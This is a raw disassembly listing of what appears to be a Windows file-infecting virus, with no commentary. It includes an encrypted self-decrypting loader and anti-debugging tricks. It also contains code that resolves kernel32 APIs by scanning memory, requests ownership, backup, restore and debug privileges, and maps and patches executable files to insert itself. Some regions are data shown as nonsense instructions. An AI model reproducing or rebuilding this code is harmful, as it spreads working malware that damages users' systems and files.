; END OF FUNCTION CHUNK FOR sub_3143A101
; ---------------------------------------------------------------------------
loc_3143A08D: ; CODE XREF: UPX2:31439FE5�j
cmp al, 0FFh
jnz loc_3143A129
cmp byte ptr [esi], 15h
jnz loc_3143A129
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_31439464+7
cmp [ebp+1042F4h], edi
jnz short loc_3143A129
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3143A0D6
cmp eax, [ebp+10431Ch]
jb short loc_3143A13F
loc_3143A0D6: ; CODE XREF: UPX2:3143A0CC�j
cmp eax, 70000000h
jb short loc_3143A114
call sub_3143A101
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_3143A100
add esp, 10h
push dword ptr [ecx]
pop dword ptr [esp+1Ch]
popa
jmp short loc_3143A11B
; ---------------------------------------------------------------------------
locret_3143A100: ; CODE XREF: UPX2:3143A0F2�j
retn
; =============== S U B R O U T I N E =======================================
sub_3143A101 proc near ; CODE XREF: UPX2:3143A0DD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 31439FE2 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 3143A065 SIZE 00000028 BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_31439530+42h
popa
loc_3143A114: ; CODE XREF: UPX2:3143A0DB�j
test eax, 80000000h
jnz short loc_3143A129
loc_3143A11B: ; CODE XREF: UPX2:3143A0FE�j
sub eax, [edi+0Ch]
jb short loc_3143A129
cmp eax, [edi+8]
jb loc_3143A065
loc_3143A129: ; CODE XREF: UPX2:3143A008�j
; UPX2:3143A016�j ...
dec ecx
jnz loc_31439FE2
mov edi, [esp+4+var_4]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3143A181
; ---------------------------------------------------------------------------
loc_3143A13F: ; CODE XREF: sub_3143A101-7F�j
; UPX2:3143A0D4�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3143A181: ; CODE XREF: sub_3143A101+3C�j
pop edi
pop esi
retn
sub_3143A101 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 57h ; W
db 0FFh, 95h, 0BAh
db 3Eh ; >
db 10h, 0, 0C1h
db 0E8h ;
db 1Fh, 0Fh, 85h
db 1Ah
db 1, 2 dup(0)
db 50h ; P
db 54h, 6Ah, 28h
db 6Ah ; j
db 2 dup(0FFh), 95h
db 1Ah
db 3Fh, 10h, 0
db 85h ;
db 0C0h, 5Fh, 0Fh
db 88h ;
db 5, 1, 0
db 0
db 0E8h, 58h, 0E4h
db 0FFh
db 0FFh, 0E8h, 11h
db 0
db 2 dup(0), 53h
aEtfilesecurity db 'etFileSecurityA',0
db 0FFh
db 0B5h, 88h, 42h
db 10h
align 2
dw 95FFh
db 6Eh ; n
db 3Eh, 10h, 0
db 89h ;
db 85h, 90h, 42h
db 10h
align 2
dw 19E8h
db 0
db 2 dup(0), 53h
aEtakeownership db 'eTakeOwnershipPrivilege',0
db 57h ; W
db 0E8h, 29h, 0E8h
db 0FFh
db 0FFh, 0E8h, 13h
db 0
db 2 dup(0), 53h
aErestoreprivil db 'eRestorePrivilege',0
dw 0E857h
db 0Bh
db 0E8h, 2 dup(0FFh)
db 0E8h ;
db 12h, 2 dup(0)
db 0
aSebackupprivil db 'SeBackupPrivilege',0
db 57h
dd 0FFE7EEE8h, 18E8FFh, 65530000h, 6E616843h, 6F4E6567h
dd 79666974h, 76697250h, 67656C69h, 0E8570065h, 0FFFFE7CBh
dd 858D5450h, 103DCCh, 6A50646Ah, 95FF5701h, 103F26h, 0FF243C89h
dd 103E6295h, 8DC02A00h, 104184BDh, 50505000h, 3DCCB5FFh
dd 1680010h, 54000400h, 0FF57016Ah, 10429095h, 46A5400h
dd 9095FF57h, 83001042h, 0B5FF14C4h, 104288h, 3E9E95FFh
dd 0C35F0010h, 4184B58Dh, 0FF560010h, 103EA295h, 0FFF88300h
dd 0BB840Fh, 85890000h, 104294h, 0FF56006Ah, 103EDE95h
dd 0FC08500h, 0A484h, 50C02B00h, 50036A50h, 68016Ah, 56C00000h
dd 3E7E95FFh, 0F8830010h, 7840FFFh, 89000006h, 10429885h
dd 9C8D8D00h, 8D001042h, 1042A495h, 6A525100h, 95FF5000h
dd 103EAAh, 0FFFF883h, 5D584h, 0FF006A00h, 104298B5h, 0A695FF00h
dd 8300103Eh, 840FFFF8h, 5BEh, 42AC8589h, 0C9330010h, 5051C303h
dd 51046A51h, 4298B5FFh, 95FF0010h, 103E82h, 840FC085h
dd 59Ah, 8589C933h, 1042B0h, 68515151h, 0F001Fh, 0CA95FF50h
dd 8500103Eh, 53840FC0h, 89000005h, 1042B485h, 27B8C300h
dd 8B000073h, 85F7384Bh, 1039C0h, 20000000h, 85030675h
dd 101069h, 0C103D233h, 0E1F7F1F7h, 42C08589h, 0CBB80010h
dd 8B000029h, 85033C4Bh, 101069h, 0C103D233h, 0E1F7F1F7h
dd 42B88589h, 0FC30010h, 0F9064BB7h, 538D35E3h, 43B70F18h
dd 49D00314h, 328C16Bh, 5F3A81D0h, 0F96E6977h, 7A831D74h
dd 0E072010Ch, 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh
dd 0AC853BC1h, 0C3001042h, 1024548Bh, 828FC033h, 0B8h
dd 0EBCF8BC3h, 84BD8D0Bh, 0FC001041h, 0C933DF8Bh, 72613CACh
dd 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch, 0E875003Ch
dd 18BC9E3h, 4558453Dh, 3D0B7400h, 524353h, 0FF33850Fh
dd 38BFFFFh, 4E49573Dh, 26840F43h, 3DFFFFFFh, 4E554357h
dd 0FF1B840Fh, 573DFFFFh, 0F323343h, 0FFFF1084h, 53503DFFh
dd 840F4F54h, 0FFFFFF05h, 2DE8DB33h, 75FFFFFEh, 0FCFAE810h
dd 21E8FFFFh, 0FFFFFFEh, 0FFFEEC84h, 0E8D233FFh, 16h, 0FFFF63E8h
dd 0E8FFh, 815D0000h, 10344FEDh, 3FAE900h, 0FF640000h
dd 0B4B58B32h, 64001042h, 81662289h, 0F5A4D3Eh, 3E385h
dd 3C5E8B00h, 8166DE03h, 0F45503Bh, 3D385h, 1643F700h
dd 2000h, 3C6850Fh, 43F60000h, 840F025Ch, 3BCh, 3D08438Bh
dd 0A0A0A0A0h, 3AE840Fh, 203D0000h, 0F202020h, 3A384h
dd 0C88B8B00h, 0E3000000h, 54E85116h, 3FFFFEFh, 1042F88Dh
dd 83CE0300h, 83004061h, 0E8004461h, 0FFFFFE9Bh, 37A820Fh
dd 0A5830000h, 1042FCh, 8428B00h, 2B104A8Bh, 330473C1h
dd 305EBC0h, 104A89C8h, 42BC8589h, 4A030010h, 0B80Ch, 0E8510001h
dd 0FFFFE68Ah, 39BE9530h, 20B10010h, 39BFB530h, 206A0010h
dd 7858C9FEh, 0E670E814h, 0D285FFFFh, 0D3C2940Fh, 0C09531E2h
dd 0EB001039h, 0C085F7E5h, 1039h, 74020000h, 0C085F722h
dd 3001039h, 75000000h, 0C0A5810Ch, 0FF001039h, 0EBF7FFFFh
dd 0C08D810Ah, 1039h, 68100000h, 6, 66859h, 0E8580000h
dd 0FFFFE622h, 39B8858Ah, 84860010h, 1039B82Ah, 0B8858800h
dd 0E2001039h, 0C085F7E0h, 8001039h, 75000000h, 0BABD8009h
dd 1001039h, 85F7C574h, 1039C0h, 10000000h, 0BD801B74h
dd 1039B8h, 80B07405h, 1039B9BDh, 0A7740500h, 39BABD80h
dd 74050010h, 0C085F79Eh, 1039h, 74004000h, 0B8BD8009h
dd 2001039h, 0A5838977h, 104300h, 0F272E800h, 43E8FFFFh
dd 0E8FFFFFDh, 271h, 42B89D8Bh, 9D030010h, 1042BCh, 0FFFC5BE8h
dd 51840FFFh, 8B000002h, 1042B4B5h, 3C5E8B00h, 5CE8DE03h
dd 0FFFFFFDh, 23B82h, 244A8100h, 0E0000060h, 5652FE8Bh
dd 3147A03h, 85F7107Ah, 1039C0h, 20000000h, 0BD891475h
dd 104304h, 39CCB58Dh, 8D8B0010h, 101069h, 0B957A4F3h
dd 0A73h, 1000B58Dh, 0A5F30010h, 2E300B1h, 85F7A4F3h, 1039C0h
dd 20000000h, 0AE840Fh, 73FF0000h, 0ED9DE828h, 958BFFFFh
dd 1042F4h, 840FD285h, 98h, 42B4B58Bh, 4A8B0010h, 244A8110h
dd 0E0000060h, 73084A2Bh, 3C93302h, 8D3B1472h, 101069h
dd 10698D8Bh, 56720010h, 83243C8Bh, 101069A5h, 0A7830000h
dd 69h, 87A8B00h, 3084A01h, 8BF787F7h, 1042C885h, 0C085F700h
dd 40001039h, 74000000h, 318F702h, 30290C72h, 4300B589h
dd 738B0010h, 0F7300128h, 1039C085h, 4000h, 0F7027400h
dd 2BE85118h, 59FFFFFCh, 73030CEBh, 0C722B28h, 0A4F35651h
dd 0B58D595Fh, 1039CCh, 4304BD89h, 0A4F30010h, 310F5E5Fh
dd 37878D92h, 3A000001h, 1039BE95h, 69067500h, 345678D2h
dd 50896612h, 0D9E1E8E7h, 8B5AFFFFh, 4A030C4Ah, 0C085F710h
dd 1039h, 8D200000h, 13750541h, 43008D89h, 85030010h, 101069h
dd 69A783h, 2B000000h, 87892843h, 54h, 3F7C85F7h, 10010h
dd 7740000h, 0A00843C7h, 0F7A0A0A0h, 1039C085h, 40000000h
dd 52077400h, 0FFF75BE8h, 8D8B5AFFh, 104300h, 4B8905E3h
dd 8B0DEB28h, 1042FC8Dh, 0EB02E300h, 284B8B03h, 39C085F7h
dd 30010h, 14740000h, 4304858Bh, 8D030010h, 1042ECh, 42E88503h
dd 8010010h, 8B104A8Bh, 1042B885h, 84A3900h, 4A890373h
dd 10420108h, 586383h, 42C0858Bh, 0CC680010h, 1000029h
dd 1590842h, 958A5043h, 1039BEh, 39C085F7h, 10h, 6742000h
dd 10698D03h, 0B60010h, 39C085F7h, 10h, 14750002h, 85F7C6FEh
dd 1039C0h, 40000h, 0B58A0675h, 1039BFh, 39C085F7h, 40000010h
dd 0B750000h, 0C202078Ah, 0E2D602AAh, 8A09EBF7h, 0AAC23207h
dd 0F7E2D602h, 8B64D233h, 28F6422h, 98BD8358h, 1042h, 0FABF840Fh
dd 0B5FFFFFFh, 1042B4h, 3EEE95FFh, 0B5FF0010h, 1042B0h
dd 3E6295FFh, 8D8D0010h, 10429Ch, 42A4958Dh, 52510010h
dd 0B5FF006Ah, 104298h, 3EE295FFh, 0B5FF0010h, 104298h
dd 3E6295FFh, 0B58D0010h, 104184h, 4294B5FFh, 0FF560010h
dd 103EDE95h, 98A58300h, 1042h, 0E8C3h, 6A5D0000h, 0CBED8101h
dd 58001038h, 85C10FF0h, 101588h, 83C3C085h, 0FF0FFC8h
dd 158885C1h, 3DC30010h, 2A0010h, 81661C75h, 6C0C247Ch
dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFAB5h, 0FFFFD2E8h
dd 0FF2E61FFh, 3456782Dh, 25B812h, 0E8600000h, 0FFFFFFA5h
dd 448B3975h, 0B58D3024h, 104184h, 6608508Bh, 2063A81h
dd 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h, 103F2Eh, 8108C483h
dd 3F3F5C3Eh, 8303755Ch, 62E804C6h, 0E8FFFFFAh, 0FFFFFF7Fh
dd 74B8C361h, 0EB000000h, 2FB8B1h, 1DE80000h, 0C2000000h
dd 30B80020h, 0E8000000h, 10h, 0B80024C2h, 185h, 3E8h
dd 2CC200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h
dd 1A8B5D30h, 39A2ED81h, 0B3E80010h, 61FFFFE0h, 10004C2h
dd 5030602h, 20455507h, 0FF0C25D6h, 119815h, 0FF8B01h
dd 125h dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 7Ch, 125h dup(0)
dd 98000000h, 1328h dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
xchg ebx, ebx
mov ecx, ecx
jmp short $+2
call sub_31440014
jmp short $+2
cld
call sub_3144007E
nop
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31440014 proc near ; CODE XREF: start+6�p
push dword ptr fs:0
mov fs:0, esp
nop
sub esi, esi
sub ecx, ecx
xchg ebx, ebx
cld
mov cl, 7
mov eax, eax
loc_3144002C: ; CODE XREF: sub_31440014+1E�j
lea esi, [esi+1]
mov ecx, ecx
clc
loop loc_3144002C
nop
call sub_31440077
nop
add edx, 56h
push edx
mov ecx, 29CCh
mov ebx, ebx
loc_31440049: ; CODE XREF: sub_31440014+4F�j
mov al, [edx]
stc
stc
xor ax, si
stc
xchg ebx, ebx
stc
mov [edx], al
jmp short $+2
add edx, 1
inc esi
sub ecx, 1
stc
cmp ecx, 0
jnz short loc_31440049
pop edx
mov ebx, ebx
cmc
pop large dword ptr fs:0
pop esi
cld
cld
clc
jmp edx
sub_31440014 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
clc
; =============== S U B R O U T I N E =======================================
sub_31440077 proc near ; CODE XREF: sub_31440014+21�p
pop edx
clc
stc
jmp edx
sub_31440077 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cld
stc
; =============== S U B R O U T I N E =======================================
sub_3144007E proc near ; CODE XREF: start+E�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3144007E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 87h, 0DBh
; ---------------------------------------------------------------------------
cld
clc
clc
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_314400DD
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_314400D1
mov ebx, [eax+29C1h]
jmp short loc_314400DB
; ---------------------------------------------------------------------------
loc_314400D1: ; CODE XREF: UPX2:314400C7�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_314400DB: ; CODE XREF: UPX2:314400CF�j
mov ebx, [ebx]
loc_314400DD: ; CODE XREF: UPX2:314400AF�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 8095h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3144010B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3144010B: ; CODE XREF: UPX2:31440104�j
and ebx, 0FFFFF000h
loc_31440111: ; CODE XREF: UPX2:31440120�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_31440122
loc_3144011A: ; CODE XREF: UPX2:3144012F�j
sub ebx, 100h
jnz short loc_31440111
loc_31440122: ; CODE XREF: UPX2:31440118�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3144011A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3144013C: ; CODE XREF: UPX2:loc_31440150�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_31440150
cmp dword ptr [eax+5], 6441636Fh
jz short loc_31440155
loc_31440150: ; CODE XREF: UPX2:31440145�j
loop loc_3144013C
pop ecx
jmp short loc_31440180
; ---------------------------------------------------------------------------
loc_31440155: ; CODE XREF: UPX2:3144014E�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_314401C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144020E
loc_31440180: ; CODE XREF: UPX2:31440153�j
; sub_3144020E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_314401AC
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_314401AC: ; CODE XREF: sub_3144020E-83�j
pop ebp
locret_314401AD: ; CODE XREF: UPX2:314401AE�j
retn
; END OF FUNCTION CHUNK FOR sub_3144020E
; ---------------------------------------------------------------------------
jl short locret_314401AD
; =============== S U B R O U T I N E =======================================
sub_314401B0 proc near ; CODE XREF: sub_314424EB+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_314401B8: ; CODE XREF: sub_314401B0+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_314401B8
pop ebx
retn
sub_314401B0 endp
; ---------------------------------------------------------------------------
loc_314401C7: ; CODE XREF: UPX2:3144017E�j
call near ptr loc_314401D6+2
inc ebx
insb
outsd
jnb short near ptr loc_31440233+3
dec eax
popa
outsb
db 64h
insb
loc_314401D6: ; CODE XREF: UPX2:loc_314401C7�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_314401F2+1
inc ebx
jb short loc_3144024E
popa
jz short near ptr loc_31440250+1
inc ebp
jbe short near ptr loc_31440250+4
outsb
jz short loc_31440233
loc_314401F2: ; CODE XREF: UPX2:314401E1�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3144020E
inc edi
db 65h
jz short near ptr loc_31440250+1
popa
jnb short near ptr loc_3144027A+2
inc ebp
jb short near ptr loc_3144027A+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3144020E proc near ; CODE XREF: UPX2:314401FC�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 31440180 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 314405C4 SIZE 0000000B BYTES
push ebx
call esi ; lstrcatA
mov [ebp+103E6Ah], eax
call sub_314405EF
test eax, eax
jz loc_31440180
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_314405C4
loc_31440233: ; CODE XREF: UPX2:314401F0�j
; UPX2:314401CF�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_31440250
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_3144024E: ; CODE XREF: UPX2:314401E7�j
jmp short loc_31440257
; ---------------------------------------------------------------------------
loc_31440250: ; CODE XREF: sub_3144020E+2C�j
; UPX2:314401EA�j ...
and dword ptr [ebp+101598h], 0
loc_31440257: ; CODE XREF: sub_3144020E:loc_3144024E�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_3144027A: ; CODE XREF: UPX2:31440206�j
; UPX2:31440209�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3144062C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_31440373
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_314405C4
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_314405C4
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_314405C4
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_31440363
jmp loc_314405C4
; ---------------------------------------------------------------------------
loc_31440363: ; CODE XREF: sub_3144020E+14B�p
; sub_3144020E+162�j
push 1
pop ecx
jecxz short locret_31440372
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_31440363
; ---------------------------------------------------------------------------
locret_31440372: ; CODE XREF: sub_3144020E+158�j
retn
; ---------------------------------------------------------------------------
loc_31440373: ; CODE XREF: sub_3144020E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_314405C4
call near ptr loc_3144038A+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3144038A: ; CODE XREF: sub_3144020E+172�p
add bh, bh
sub_3144020E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3144062C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_314405C4
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_314405C4
mov ecx, [ebp+103F06h]
jecxz short loc_31440413
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_31440413
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_31440413: ; CODE XREF: UPX2:314403F7�j
; UPX2:31440408�j
call sub_314405D0
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_3144045C: ; CODE XREF: UPX2:31440465�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_3144045C
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_314405C4
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144020E
loc_314405C4: ; CODE XREF: sub_3144020E+1F�j
; sub_3144020E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_31440180
; END OF FUNCTION CHUNK FOR sub_3144020E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_314405D0 proc near ; CODE XREF: UPX2:loc_31440413�p
; sub_314405EF+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_314405D0 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_314405EF proc near ; CODE XREF: sub_3144020E+9�p
xor ecx, ecx
call sub_314405D0
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_314405EF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3144062C proc near ; CODE XREF: sub_3144020E+7C�p
; UPX2:314403A2�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_31440637: ; CODE XREF: sub_3144062C+E�j
lodsb
test al, al
jnz short loc_31440637
loop sub_3144062C
retn
sub_3144062C endp
; =============== S U B R O U T I N E =======================================
sub_3144063F proc near ; CODE XREF: sub_314421BD+25�p
; FUNCTION CHUNK AT 314406C9 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 31440A99 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_3144066C+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_314406C9
jbe short near ptr loc_314406C9+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_314406D0
inc ecx
loc_3144066C: ; CODE XREF: sub_3144063F+13�p
add [eax-1], dl
sub_3144063F endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144063F
loc_314406C9: ; CODE XREF: sub_3144063F+1F�j
; sub_3144063F+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_31440733+2
loc_314406D0: ; CODE XREF: sub_3144063F+2A�j
push edx
db 65h
insd
outsd
jz short loc_3144073B
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_31440746+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_31440752+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_31440771+1
push 4500746Fh
js short loc_3144076F
jz short near ptr loc_3144075B+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_31440790
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_31440773+6
loc_31440733: ; CODE XREF: sub_3144063F+8F�j
imul ebp, [ebp+41h], 69727474h
loc_3144073B: ; CODE XREF: sub_3144063F+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_31440782
add [edi+65h], al
jz short near ptr loc_3144078B+1
loc_31440746: ; CODE XREF: sub_3144063F+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_31440798
loc_31440752: ; CODE XREF: sub_3144063F+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_3144075B: ; CODE XREF: sub_3144063F+C7�j
db 65h
jz short near ptr loc_314407AA+1
outsd
db 64h
jnz short near ptr loc_314407C9+5
db 65h
dec eax
popa
outsb
db 64h
insb
